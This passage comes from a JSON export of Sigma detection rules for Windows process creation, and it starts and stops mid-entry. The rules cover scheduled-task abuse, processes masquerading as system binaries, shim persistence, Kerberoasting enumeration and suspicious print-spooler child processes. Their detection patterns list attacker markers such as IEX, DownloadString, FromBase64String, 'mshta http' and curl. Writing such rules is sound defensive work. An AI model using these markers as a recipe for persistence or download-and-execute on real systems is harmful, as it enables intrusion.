Files\\Dell\\SupportAssist\\pcdrcui.exe'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_susp_pattern.yml",
    "content": "title: Suspicious Command Patterns In Scheduled Task Creation\nid: f2c64357-b1d2-41b7-849f-34d2682c0fad\nstatus: test\ndescription: Detects scheduled task creation using \"schtasks\" that contain potentially suspicious or uncommon commands\nreferences:\n    - https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/\n    - https://twitter.com/RedDrip7/status/1506480588827467785\n    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-23\nmodified: 2024-03-19\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_schtasks:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains: '/Create '\n    selection_pattern_1:\n        CommandLine|contains:\n            - '/sc minute '\n            - '/ru system '\n    selection_pattern_2:\n        CommandLine|contains:\n            - 'cmd /c'\n            - 'cmd /k'\n            - 'cmd /r'\n            - 'cmd.exe /c '\n            - 'cmd.exe /k '\n            - 'cmd.exe /r '\n    selection_uncommon:\n        CommandLine|contains:\n            - ' -decode '\n            - ' -enc '\n            - ' -w hidden '\n            - ' bypass '\n            - ' IEX'\n            - '.DownloadData'\n            - '.DownloadFile'\n            - '.DownloadString'\n            - '/c start /min ' # https://twitter.com/RedDrip7/status/1506480588827467785\n            - 'FromBase64String'\n            - 'mshta http'\n            - 'mshta.exe http'\n    selection_anomaly_1:\n        CommandLine|contains:\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - ':\\Tmp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\'\n            - '%AppData%'\n            - '%Temp%'\n            - '%tmp%'\n    selection_anomaly_2:\n        CommandLine|contains:\n            - 'cscript'\n            - 'curl'\n            - 'wscript'\n    condition: selection_schtasks and ( all of selection_pattern_* or selection_uncommon or all of selection_anomaly_* )\nfalsepositives:\n    - Software installers that run from temporary folders and also install scheduled tasks are expected to generate some false positives\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_system.yml",
    "content": "title: Schtasks Creation Or Modification With SYSTEM Privileges\nid: 89ca78fd-b37c-4310-b3d3-81a023f83936\nstatus: test\ndescription: Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges\nreferences:\n    - https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-28\nmodified: 2025-02-15\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_root:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains:\n            - ' /change '\n            - ' /create '\n    selection_run:\n        CommandLine|contains: '/ru '\n    selection_user:\n        CommandLine|contains:\n            - 'NT AUT' # This covers the usual NT AUTHORITY\\SYSTEM\n            - ' SYSTEM ' # SYSTEM is a valid value for schtasks hence it gets its own value with space\n    filter_optional_teamviewer:\n        # FP from test set in SIGMA\n        # Cannot use ParentImage on all OSes for 4688 events\n        # ParentImage|contains|all:\n        #     - '\\AppData\\Local\\Temp\\'\n        #     - 'TeamViewer_.exe'\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - '/TN TVInstallRestore'\n            - '\\TeamViewer_.exe'\n    filter_optional_office:\n        CommandLine|contains|all:\n            # https://answers.microsoft.com/en-us/msoffice/forum/all/office-15-subscription-heartbeat-task-created-on/43ab5e53-a9fb-47c6-8c14-44889974b9ff\n            - 'Subscription Heartbeat'\n            - '\\HeartbeatConfig.xml'\n            - '\\Microsoft Shared\\OFFICE'\n    filter_optional_avira:\n        CommandLine|contains:\n            - '/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR '\n            - ':\\Program Files (x86)\\Avira\\System Speedup\\setup\\avira_speedup_setup.exe'\n            - '/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_system_process.yml",
    "content": "title: Scheduled Task Creation Masquerading as System Processes\nid: 9f8573c9-22b4-40e3-89c1-72bc2b8d49ab\nstatus: experimental\ndescription: Detects the creation of scheduled tasks that involve system processes, which may indicate malicious actors masquerading as or abusing these processes to execute payloads or maintain persistence.\nreferences:\n    - https://tria.ge/241015-l98snsyeje/behavioral2\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-02-05\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\n    - attack.defense-evasion\n    - attack.t1036.004\n    - attack.t1036.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_cli:\n        CommandLine|contains|windash: ' /create '\n        CommandLine|contains:\n            - ' audiodg'\n            - ' conhost'\n            - ' dwm.exe'\n            - ' explorer'\n            - ' lsass'\n            - ' lsm'\n            - ' mmc'\n            - ' msiexec'\n            - ' regsvr32'\n            - ' rundll32'\n            - ' services'\n            - ' spoolsv'\n            - ' svchost'\n            - ' taskeng'\n            - ' taskhost'\n            - ' wininit'\n            - ' winlogon'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate system administration tasks scheduling trusted system processes.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_scrcons_susp_child_process.yml",
    "content": "title: Script Event Consumer Spawning Process\nid: f6d1dd2f-b8ce-40ca-bc23-062efb686b34\nstatus: test\ndescription: Detects a suspicious child process of Script Event Consumer (scrcons.exe).\nreferences:\n    - https://redcanary.com/blog/child-processes/\n    - https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html\nauthor: Sittikorn S\ndate: 2021-06-21\nmodified: 2022-07-14\ntags:\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\scrcons.exe'\n        Image|endswith:\n            - '\\svchost.exe'\n            - '\\dllhost.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n            - '\\schtasks.exe'\n            - '\\regsvr32.exe'\n            - '\\mshta.exe'\n            - '\\rundll32.exe'\n            - '\\msiexec.exe'\n            - '\\msbuild.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sdbinst_shim_persistence.yml",
    "content": "title: Potential Shim Database Persistence via Sdbinst.EXE\nid: 517490a7-115a-48c6-8862-1a481504d5a8\nrelated:\n    - id: 18ee686c-38a3-4f65-9f44-48a077141f42\n      type: similar\nstatus: test\ndescription: |\n    Detects installation of a new shim using sdbinst.exe.\n    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims\nreferences:\n    - https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence\nauthor: Markus Neis\ndate: 2019-01-16\nmodified: 2023-12-06\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\sdbinst.exe'\n        - OriginalFileName: 'sdbinst.exe'\n    selection_cli:\n        CommandLine|contains: '.sdb'\n    filter_optional_iis:\n        ParentImage|endswith: '\\msiexec.exe'\n        CommandLine|contains:\n            # Expected behavior for IIS Express (e.g. https://www.hybrid-analysis.com/sample/15d4ff941f77f7bdfc9dfb2399b7b952a0a2c860976ef3e835998ff4796e5e91?environmentId=120)\n            - ':\\Program Files (x86)\\IIS Express\\iisexpressshim.sdb'\n            - ':\\Program Files\\IIS Express\\iisexpressshim.sdb'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sdbinst_susp_extension.yml",
    "content": "title: Uncommon Extension Shim Database Installation Via Sdbinst.EXE\nid: 18ee686c-38a3-4f65-9f44-48a077141f42\nrelated:\n    - id: 517490a7-115a-48c6-8862-1a481504d5a8\n      type: derived\nstatus: test\ndescription: |\n    Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe.\n    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html\n    - https://github.com/nasbench/Misc-Research/blob/8ee690e43a379cbce8c9d61107442c36bd9be3d3/Other/Undocumented-Flags-Sdbinst.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-01\nmodified: 2024-01-10\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\sdbinst.exe'\n        - OriginalFileName: 'sdbinst.exe'\n    filter_main_legit_ext:\n        CommandLine|contains: '.sdb'\n    filter_main_legit_extensions:\n        # ParentImage|endswith: ':\\Windows\\System32\\svchost.exe'\n        - CommandLine|endswith:\n              - ' -c'\n              - ' -f'\n              - ' -mm'\n              - ' -t'\n        - CommandLine|contains: ' -m -bg'\n    filter_main_null:\n        CommandLine: null\n    filter_main_empty:\n        CommandLine: ''\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml",
    "content": "title: Sdclt Child Processes\nid: da2738f2-fadb-4394-afa7-0a0674885afa\nstatus: test\ndescription: A general detection for sdclt spawning new processes. This could be an indicator of sdclt being used in UAC bypass techniques.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/6\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\sdclt.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml",
    "content": "title: Sdiagnhost Calling Suspicious Child Process\nid: f3d39c45-de1a-4486-a687-ab126124f744\nstatus: test\ndescription: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)\nreferences:\n    - https://twitter.com/nao_sec/status/1530196847679401984\n    - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e\n    - https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/\n    - https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/\n    - https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/\nauthor: Nextron Systems, @Kostastsale\ndate: 2022-06-01\nmodified: 2024-08-23\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\sdiagnhost.exe'\n        Image|endswith:\n            # Add more suspicious LOLBins\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\cmd.exe'\n            - '\\mshta.exe'\n            - '\\cscript.exe'\n            - '\\wscript.exe'\n            - '\\taskkill.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            # - '\\csc.exe'   # https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/\n            - '\\calc.exe'  # https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/\n    filter_main_cmd_bits:\n        Image|endswith: '\\cmd.exe'\n        CommandLine|contains: 'bits'\n    filter_main_powershell_noprofile:\n        Image|endswith: '\\powershell.exe'\n        CommandLine|endswith:\n            - '-noprofile -'\n            - '-noprofile'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_secedit_execution.yml",
    "content": "title: Potential Suspicious Activity Using SeCEdit\nid: c2c76b77-32be-4d1f-82c9-7e544bdfe0eb\nstatus: test\ndescription: Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy\nreferences:\n    - https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit\nauthor: Janantha Marasinghe\ndate: 2022-11-18\nmodified: 2022-12-30\ntags:\n    - attack.collection\n    - attack.discovery\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.privilege-escalation\n    - attack.t1562.002\n    - attack.t1547.001\n    - attack.t1505.005\n    - attack.t1556.002\n    - attack.t1562\n    - attack.t1574.007\n    - attack.t1564.002\n    - attack.t1546.008\n    - attack.t1546.007\n    - attack.t1547.014\n    - attack.t1547.010\n    - attack.t1547.002\n    - attack.t1557\n    - attack.t1082\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\secedit.exe'\n        - OriginalFileName: 'SeCEdit'\n    selection_flags_discovery:\n        CommandLine|contains|all:\n            - '/export'\n            - '/cfg'\n    selection_flags_configure:\n        CommandLine|contains|all:\n            - '/configure'\n            - '/db'\n    # filter:\n    #     SubjectUserName|endswith: '$'  SubjectUserName is from event ID 4719 in the Windows Security log\n    condition: selection_img and (1 of selection_flags_*)\nfalsepositives:\n    - Legitimate administrative use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_security_susp_node_js_execution.yml",
    "content": "title: NodeJS Execution of JavaScript File\nid: ba3874b9-0fae-465f-836c-eb5d071a1789\nstatus: experimental\ndescription: |\n    Detects execution of JavaScript or JSC files using NodeJs binary node.exe, that could be potentially suspicious.\n    Node.js is a popular open-source JavaScript runtime that runs code outside browsers and is widely used for both frontend and backend development.\n    Adversaries have been observed abusing Node.js to disguise malware as legitimate processes, evade security defenses, and maintain persistence within target systems.\n    Because Node.js is commonly used, this rule may generate false positives in some environments. However, if such activity is unusual in your environment, it is highly suspicious and warrants immediate investigation.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2025/04/15/threat-actors-misuse-node-js-to-deliver-malware-and-other-malicious-payloads/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-04-21\ntags:\n    - attack.execution\n    - attack.t1059.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\node.exe'\n        - OriginalFileName: 'node.exe'\n        - Product: 'Node.js'\n    selection_cmd:\n        CommandLine|contains: '.js'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of node.exe to execute JavaScript or JSC files on your environment\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml",
    "content": "title: Suspicious Serv-U Process Pattern\nid: 58f4ea09-0fc2-4520-ba18-b85c540b0eaf\nstatus: test\ndescription: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service\nreferences:\n    - https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-14\nmodified: 2022-07-14\ntags:\n    - attack.credential-access\n    - attack.t1555\n    - cve.2021-35211\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\Serv-U.exe'\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n            - '\\sh.exe'\n            - '\\bash.exe'\n            - '\\schtasks.exe'\n            - '\\regsvr32.exe'\n            - '\\wmic.exe'  # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/\n            - '\\mshta.exe'\n            - '\\rundll32.exe'\n            - '\\msiexec.exe'\n            - '\\forfiles.exe'\n            - '\\scriptrunner.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_setres_uncommon_child_process.yml",
    "content": "title: Uncommon Child Process Of Setres.EXE\nid: 835e75bf-4bfd-47a4-b8a6-b766cac8bcb7\nstatus: test\ndescription: |\n    Detects uncommon child process of Setres.EXE.\n    Setres.EXE is a Windows server only process and tool that can be used to set the screen resolution.\n    It can potentially be abused in order to launch any arbitrary file with a name containing the word \"choice\" from the current execution path.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Setres/\n    - https://twitter.com/0gtweet/status/1583356502340870144\n    - https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html\n    - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)\nauthor: '@gott_cyber, Nasreddine Bencherchali (Nextron Systems)'\ndate: 2022-12-11\nmodified: 2024-06-26\ntags:\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\setres.exe'\n        Image|contains: '\\choice'\n    filter_main_legit_location:\n        Image|endswith:\n            - 'C:\\Windows\\System32\\choice.exe'\n            - 'C:\\Windows\\SysWOW64\\choice.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_setspn_spn_enumeration.yml",
    "content": "title: Potential SPN Enumeration Via Setspn.EXE\nid: 1eeed653-dbc8-4187-ad0c-eeebb20e6599\nstatus: test\ndescription: Detects service principal name (SPN) enumeration used for Kerberoasting\nreferences:\n    - https://web.archive.org/web/20200329173843/https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation\n    - https://www.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation/?edition=2019\nauthor: Markus Neis, keepwatch\ndate: 2018-11-14\nmodified: 2023-10-23\ntags:\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_pe:\n        - Image|endswith: '\\setspn.exe'\n        - OriginalFileName: 'setspn.exe'\n        - Description|contains|all:\n              - 'Query or reset the computer'\n              - 'SPN attribute'\n    selection_cli:\n        CommandLine|contains:\n            - ' -q '\n            - ' /q '\n    condition: all of selection_*\nfalsepositives:\n    - Administration activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_setup16_custom_lst_execution.yml",
    "content": "title: Setup16.EXE Execution With Custom .Lst File\nid: 99c8be4f-3087-4f9f-9c24-8c7e257b442e\nstatus: test\ndescription: |\n    Detects the execution of \"Setup16.EXE\", an old installation utility, with a custom \".lst\" file.\n    These \".lst\" files can contain references to external programs that \"Setup16.EXE\" will execute.\n    Attackers and adversaries might leverage this as a living off the land utility.\nreferences:\n    - https://www.hexacorn.com/blog/2024/10/12/the-sweet16-the-oldbin-lolbin-called-setup16-exe/\nauthor: frack113\ndate: 2024-12-01\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage: 'C:\\Windows\\SysWOW64\\setup16.exe'\n        ParentCommandLine|contains: ' -m '\n    filter_optional_valid_path:\n        Image|startswith: 'C:\\~MSSETUP.T\\'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - On modern Windows systems, the \"Setup16\" utility is practically never used, hence false positives should be very rare.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_shutdown_execution.yml",
    "content": "title: Suspicious Execution of Shutdown\nid: 34ebb878-1b15-4895-b352-ca2eeb99b274\nstatus: test\ndescription: Detects use of the command line to shut down or reboot Windows\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown\nauthor: frack113\ndate: 2022-01-01\ntags:\n    - attack.impact\n    - attack.t1529\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\shutdown.exe'\n        CommandLine|contains:\n            - '/r '\n            - '/s '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_shutdown_logoff.yml",
    "content": "title: Suspicious Execution of Shutdown to Log Out\nid: ec290c06-9b6b-4338-8b6b-095c0f284f10\nstatus: test\ndescription: Detects the rare use of the command line tool shutdown to log off a user\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown\nauthor: frack113\ndate: 2022-10-01\ntags:\n    - attack.impact\n    - attack.t1529\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\shutdown.exe'\n        CommandLine|contains: '/l'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sigverif_uncommon_child_process.yml",
    "content": "title: Uncommon Sigverif.EXE Child Process\nid: 7d4aaec2-08ed-4430-8b96-28420e030e04\nstatus: test\ndescription: |\n    Detects uncommon child processes spawning from \"sigverif.exe\", which could indicate potential abuse of the latter as a living off the land binary in order to proxy execution.\nreferences:\n    - https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/\n    - https://twitter.com/0gtweet/status/1457676633809330184\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-19\nmodified: 2024-08-27\ntags:\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\sigverif.exe'\n    filter_main_werfault:\n        Image:\n            - 'C:\\Windows\\System32\\WerFault.exe'\n            - 'C:\\Windows\\SysWOW64\\WerFault.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sndvol_susp_child_processes.yml",
    "content": "title: Uncommon Child Processes Of SndVol.exe\nid: ba42babc-0666-4393-a4f7-ceaf5a69191e\nstatus: test\ndescription: Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer)\nreferences:\n    - https://twitter.com/Max_Mal_/status/1661322732456353792\nauthor: X__Junior (Nextron Systems)\ndate: 2023-06-09\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith: '\\SndVol.exe'\n    filter_main_rundll32:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains: ' shell32.dll,Control_RunDLL '\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_soundrecorder_audio_capture.yml",
    "content": "title: Audio Capture via SoundRecorder\nid: 83865853-59aa-449e-9600-74b9d89a6d6e\nstatus: test\ndescription: Detects an attacker collecting audio via the SoundRecorder application.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community\ndate: 2019-10-24\nmodified: 2021-11-27\ntags:\n    - attack.collection\n    - attack.t1123\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\SoundRecorder.exe'\n        CommandLine|contains: '/FILE'\n    condition: selection\nfalsepositives:\n    - Legitimate audio capture by legitimate user.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_speechruntime_child_process.yml",
    "content": "title: Suspicious Speech Runtime Binary Child Process\nid: 78f10490-f2f4-4d19-a75b-4e0683bf3b8d\nstatus: experimental\ndescription: |\n    Detects suspicious Speech Runtime Binary Execution by monitoring its child processes.\n    Child processes spawned by SpeechRuntime.exe could indicate an attempt for lateral movement via COM & DCOM hijacking.\nreferences:\n    - https://github.com/rtecCyberSec/SpeechRuntimeMove\nauthor: andrewdanis\ndate: 2025-10-23\nlogsource:\n    category: process_creation\n    product: windows\ntags:\n    - attack.defense-evasion\n    - attack.lateral-movement\n    - attack.t1021.003\n    - attack.t1218\ndetection:\n    selection:\n        ParentImage|endswith: '\\SpeechRuntime.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_splwow64_cli_anomaly.yml",
    "content": "title: Suspicious Splwow64 Without Params\nid: 1f1a8509-2cbb-44f5-8751-8e1571518ce2\nstatus: test\ndescription: Detects suspicious Splwow64.exe process without any command line parameters\nreferences:\n    - https://twitter.com/sbousseaden/status/1429401053229891590?s=12\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-08-23\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\splwow64.exe'\n        CommandLine|endswith: 'splwow64.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml",
    "content": "title: Suspicious Spool Service Child Process\nid: dcdbc940-0bff-46b2-95f3-2d73f848e33b\nstatus: test\ndescription: Detects suspicious print spool service (spoolsv.exe) child processes.\nreferences:\n    - https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md\nauthor: Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)\ndate: 2021-07-11\nmodified: 2024-12-01\ntags:\n    - attack.execution\n    - attack.t1203\n    - attack.privilege-escalation\n    - attack.t1068\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    spoolsv:\n        ParentImage|endswith: '\\spoolsv.exe'\n        IntegrityLevel:\n            - 'System'\n            - 'S-1-16-16384'\n    suspicious_unrestricted:\n        Image|endswith:\n            - '\\gpupdate.exe'\n            - '\\whoami.exe'\n            - '\\nltest.exe'\n            - '\\taskkill.exe'\n            - '\\wmic.exe'\n            - '\\taskmgr.exe'\n            - '\\sc.exe'\n            - '\\findstr.exe'\n            - '\\curl.exe'\n            - '\\wget.exe'\n            - '\\certutil.exe'\n            - '\\bitsadmin.exe'\n            - '\\accesschk.exe'\n            - '\\wevtutil.exe'\n            - '\\bcdedit.exe'\n            - '\\fsutil.exe'\n            - '\\cipher.exe'\n            - '\\schtasks.exe'\n            - '\\write.exe'\n            - '\\wuauclt.exe'\n            - '\\systeminfo.exe'\n            - '\\reg.exe'\n            - '\\query.exe'\n    suspicious_net:\n        Image|endswith:\n            - '\\net.exe'\n            - '\\net1.exe'\n    suspicious_net_filter:\n        CommandLine|contains: 'start'\n    suspicious_cmd:\n        Image|endswith: '\\cmd.exe'\n    suspicious_cmd_filter:\n        CommandLine|contains:\n            - '.spl'\n            - 'route add'\n            - 'program files'\n    suspicious_netsh:\n        Image|endswith: '\\netsh.exe'\n    suspicious_netsh_filter:\n        CommandLine|contains:\n            - 'add portopening'\n            - 'rule name'\n    suspicious_powershell:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n    suspicious_powershell_filter:\n        CommandLine|contains: '.spl'\n    suspicious_rundll32_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    suspicious_rundll32_cli:\n        CommandLine|endswith: 'rundll32.exe'\n    condition: spoolsv and ( suspicious_unrestricted or (suspicious_net and not suspicious_net_filter) or (suspicious_cmd and not suspicious_cmd_filter) or (suspicious_netsh and not suspicious_netsh_filter) or (suspicious_powershell and not suspicious_powershell_filter) or all of suspicious_rundll32_* )\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml",
